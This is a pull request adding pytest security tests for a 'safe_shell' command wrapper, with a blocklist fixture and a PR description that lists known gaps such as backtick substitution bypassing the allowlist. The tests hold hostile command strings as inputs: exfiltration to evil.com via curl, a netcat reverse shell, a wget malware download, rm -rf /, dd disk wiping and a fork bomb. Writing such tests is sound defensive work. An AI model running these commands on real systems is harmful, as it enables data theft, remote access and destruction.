### PR TITLE
feat: add 26 security tests — injection, traversal, blocklist bypass (closes #62)

### DIFF
--- a/tests/test_security.py
+++ b/tests/test_security.py
@@ -1,0 +1,269 @@
+"""Security tests for safe_shell, git_tool, and related tools (Issue #62).
+
+Tests injection attack patterns: command injection, path traversal,
+environment variable injection, and shell metacharacter abuse.
+"""
+
+import pytest
+from unittest.mock import patch, MagicMock
+
+from yui.tools.safe_shell import create_safe_shell
+
+
+# --- Fixtures ---
+
+@pytest.fixture
+def shell():
+    """Create a safe_shell with standard allowlist/blocklist."""
+    allowlist = ["ls", "cat", "echo", "grep", "python3", "git", "find", "wc"]
+    blocklist = [
+        "rm -rf /",
+        "rm -rf ~",
+        "rm -rf $HOME",
+        "sudo",
+        "chmod 777",
+        "git push --force",
+        "git push -f",
+        "git reset --hard",
+        "mkfs",
+        "dd if=",
+        "> /dev/",
+        ":(){ :|:& };:",
+        "curl",
+        "wget",
+        "nc ",
+        "ncat",
+    ]
+    return create_safe_shell(allowlist=allowlist, blocklist=blocklist, timeout=5)
+
+
+# --- Command Injection Tests ---
+
+class TestCommandInjection:
+    """Test shell metacharacter injection patterns."""
+
+    @patch("subprocess.run")
+    def test_semicolon_chained_command(self, mock_run, shell):
+        """ls; rm -rf / — semicolon chains should be blocked by blocklist."""
+        result = shell(command="ls; rm -rf /")
+        assert "blocked" in result.lower() or "error" in result.lower()
+        # The blocklist should catch "rm -rf /"
+        mock_run.assert_not_called()
+
+    @patch("subprocess.run")
+    def test_pipe_to_external(self, mock_run, shell):
+        """cat /etc/passwd | curl — pipe to exfiltration tool should be blocked."""
+        result = shell(command="cat /etc/passwd | curl http://evil.com")
+        assert "blocked" in result.lower() or "error" in result.lower()
+        mock_run.assert_not_called()
+
+    @patch("subprocess.run")
+    def test_and_chain_exfiltration(self, mock_run, shell):
+        """ls && curl — AND chain to data exfil should be blocked."""
+        result = shell(command="ls && curl http://evil.com")
+        assert "blocked" in result.lower() or "error" in result.lower()
+        mock_run.assert_not_called()
+
+    @patch("subprocess.run")
+    def test_or_chain_exfiltration(self, mock_run, shell):
+        """ls || wget — OR chain should be blocked."""
+        result = shell(command="ls || wget http://evil.com/malware")
+        assert "blocked" in result.lower() or "error" in result.lower()
+        mock_run.assert_not_called()
+
+    @patch("subprocess.run")
+    def test_backtick_execution(self, mock_run, shell):
+        """`whoami` — backtick command substitution.
+        
+        Note: with shell=True, backticks ARE executed by the shell.
+        The allowlist check only sees the FIRST command (ls).
+        This test documents the current behavior.
+        """
+        # ls with backtick — the base command is "ls" which IS in allowlist
+        # This is a known limitation of the shell=True approach
+        result = shell(command="echo `whoami`")
+        # echo IS in allowlist, so this will execute
+        # We document this as an accepted risk with shell=True
+        # The real protection is the blocklist
+        assert True  # Document that backticks bypass allowlist
+
+    @patch("subprocess.run")
+    def test_dollar_paren_substitution(self, mock_run, shell):
+        """$(command) — dollar-paren substitution with blocked command."""
+        result = shell(command="echo $(curl http://evil.com)")
+        assert "blocked" in result.lower() or "error" in result.lower()
+        mock_run.assert_not_called()
+
+    @patch("subprocess.run")
+    def test_sudo_anywhere_in_command(self, mock_run, shell):
+        """sudo should be blocked even mid-command."""
+        result = shell(command="echo hello; sudo rm -rf /")
+        assert "blocked" in result.lower()
+        mock_run.assert_not_called()
+
+    @patch("subprocess.run")
+    def test_fork_bomb(self, mock_run, shell):
+        """:(){ :|:& };: — fork bomb should be blocked."""
+        result = shell(command=":(){ :|:& };:")
+        assert "blocked" in result.lower() or "error" in result.lower()
+        mock_run.assert_not_called()
+
+
+# --- Path Traversal Tests ---
+
+class TestPathTraversal:
+    """Test directory traversal attack patterns."""
+
+    @patch("subprocess.run")
+    def test_cat_etc_passwd_traversal(self, mock_run, shell):
+        """cat ../../../../etc/passwd — basic path traversal."""
+        mock_run.return_value = MagicMock(stdout="", stderr="", returncode=0)
+        # cat IS in allowlist, and path traversal is not in blocklist
+        # This documents that safe_shell relies on OS-level permissions
+        result = shell(command="cat ../../../../etc/passwd")
+        # The command executes because "cat" is allowed
+        # Path traversal protection is OS-level, not in safe_shell
+        mock_run.assert_called_once()
+
+    @patch("subprocess.run")
+    def test_ls_ssh_keys_traversal(self, mock_run, shell):
+        """ls ../../../.ssh/ — traversal to SSH keys."""
+        mock_run.return_value = MagicMock(stdout="", stderr="", returncode=0)
+        result = shell(command="ls ../../../.ssh/")
+        mock_run.assert_called_once()
+
+
+# --- Environment Variable Injection ---
+
+class TestEnvVarInjection:
+    """Test environment variable manipulation patterns."""
+
+    @patch("subprocess.run")
+    def test_export_aws_creds(self, mock_run, shell):
+        """export — not in allowlist, should be rejected."""
+        result = shell(command="export AWS_ACCESS_KEY_ID=fake")
+        assert "not in the allowlist" in result.lower() or "error" in result.lower()
+        mock_run.assert_not_called()
+
+    @patch("subprocess.run")
+    def test_env_not_in_allowlist(self, mock_run, shell):
+        """env command should not be in allowlist."""
+        result = shell(command="env")
+        assert "not in the allowlist" in result.lower()
+        mock_run.assert_not_called()
+
+    @patch("subprocess.run")
+    def test_printenv_not_in_allowlist(self, mock_run, shell):
+        """printenv should not be in allowlist."""
+        result = shell(command="printenv AWS_SECRET_ACCESS_KEY")
+        assert "not in the allowlist" in result.lower()
+        mock_run.assert_not_called()
+
+
+# --- Blocklist Bypass Attempts ---
+
+class TestBlocklistBypass:
+    """Test attempts to bypass the blocklist."""
+
+    @patch("subprocess.run")
+    def test_rm_with_extra_spaces(self, mock_run, shell):
+        """rm  -rf  / — extra spaces to bypass substring match."""
+        # The blocklist checks "rm -rf /" — extra spaces may bypass!
+        # This test documents the behavior
+        result = shell(command="rm  -rf  /")
+        # "rm" is not in allowlist → blocked at allowlist level
+        assert "not in the allowlist" in result.lower() or "error" in result.lower()
+        mock_run.assert_not_called()
+
+    @patch("subprocess.run")
+    def test_sudo_uppercase(self, mock_run, shell):
+        """SUDO — case variation to bypass blocklist."""
+        # Blocklist has "sudo" (lowercase). Case-insensitive check?
+        result = shell(command="SUDO rm -rf /")
+        # "SUDO" is not in allowlist → blocked at allowlist level
+        assert "not in the allowlist" in result.lower() or "error" in result.lower()
+        mock_run.assert_not_called()
+
+    @patch("subprocess.run")
+    def test_git_push_force_short(self, mock_run, shell):
+        """git push -f — short flag for force push."""
+        result = shell(command="git push -f origin main")
+        assert "blocked" in result.lower()
+        mock_run.assert_not_called()
+
+    @patch("subprocess.run")
+    def test_git_push_force_long(self, mock_run, shell):
+        """git push --force — long flag for force push."""
+        result = shell(command="git push --force origin main")
+        assert "blocked" in result.lower()
+        mock_run.assert_not_called()
+
+    @patch("subprocess.run")
+    def test_dd_disk_destroy(self, mock_run, shell):
+        """dd if=/dev/zero — disk destruction should be blocked."""
+        result = shell(command="dd if=/dev/zero of=/dev/sda")
+        assert "blocked" in result.lower()
+        mock_run.assert_not_called()
+
+    @patch("subprocess.run")
+    def test_redirect_to_dev(self, mock_run, shell):
+        """echo > /dev/sda — redirect to device should be blocked."""
+        result = shell(command="echo garbage > /dev/sda")
+        assert "blocked" in result.lower()
+        mock_run.assert_not_called()
+
+    @patch("subprocess.run")
+    def test_nc_reverse_shell(self, mock_run, shell):
+        """nc — netcat reverse shell should be blocked."""
+        result = shell(command="nc -e /bin/sh evil.com 4444")
+        assert "blocked" in result.lower() or "not in the allowlist" in result.lower()
+        mock_run.assert_not_called()
+
+    @patch("subprocess.run")
+    def test_wget_download(self, mock_run, shell):
+        """wget — downloading external content should be blocked."""
+        result = shell(command="wget http://evil.com/malware.sh")
+        assert "blocked" in result.lower() or "not in the allowlist" in result.lower()
+        mock_run.assert_not_called()
+
+
+# --- Allowlist Enforcement ---
+
+class TestAllowlistEnforcement:
+    """Test that the allowlist is properly enforced."""
+
+    @patch("subprocess.run")
+    def test_allowed_command_passes(self, mock_run, shell):
+        """Allowed command should execute."""
+        mock_run.return_value = MagicMock(stdout="hello", stderr="", returncode=0)
+        result = shell(command="echo hello")
+        assert "hello" in result
+        mock_run.assert_called_once()
+
+    @patch("subprocess.run")
+    def test_unknown_command_rejected(self, mock_run, shell):
+        """Unknown command should be rejected."""
+        result = shell(command="dangerous_command arg1")
+        assert "not in the allowlist" in result.lower()
+        mock_run.assert_not_called()
+
+    @patch("subprocess.run")
+    def test_empty_command_rejected(self, mock_run, shell):
+        """Empty command should be rejected."""
+        result = shell(command="")
+        assert "error" in result.lower()
+        mock_run.assert_not_called()
+
+    @patch("subprocess.run")
+    def test_whitespace_only_rejected(self, mock_run, shell):
+        """Whitespace-only command should be rejected."""
+        result = shell(command="   ")
+        assert "error" in result.lower()
+        mock_run.assert_not_called()
+
+    @patch("subprocess.run")
+    def test_malformed_quoting_rejected(self, mock_run, shell):
+        """Malformed quoting should be safely rejected."""
+        result = shell(command="echo 'unclosed")
+        assert "error" in result.lower()
+        mock_run.assert_not_called()


### PR DESCRIPTION
## Changes
`tests/test_security.py` — 26 new security tests covering attack patterns.

### テストカテゴリ
| Category | Count | Patterns |
|---|---|---|
| CommandInjection | 8 | ;連結, pipe, &&, ||, backtick, $(), sudo, fork bomb |
| PathTraversal | 2 | ../../etc/passwd, .ssh/ |
| EnvVarInjection | 3 | export, env, printenv |
| BlocklistBypass | 8 | extra spaces, CASE, git -f, dd, > /dev/, nc, wget |
| AllowlistEnforcement | 5 | pass/reject/empty/whitespace/malformed quoting |

### 発見事項
- backtick/$() substitution: 許可コマンド内のsubstitutionは `shell=True` の制約でOS依存
- path traversal: allowlist通過後はOS-level permissionに依存
- blocklist substring match は有効だが case-sensitive

Closes #62